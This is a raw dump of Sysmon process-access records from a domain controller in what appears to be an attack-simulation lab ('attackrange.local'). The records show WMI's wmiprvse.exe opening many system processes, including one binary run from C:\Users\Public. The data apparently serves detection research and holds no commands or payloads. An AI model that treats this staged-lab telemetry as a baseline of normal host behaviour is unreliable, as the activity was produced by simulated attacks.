15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 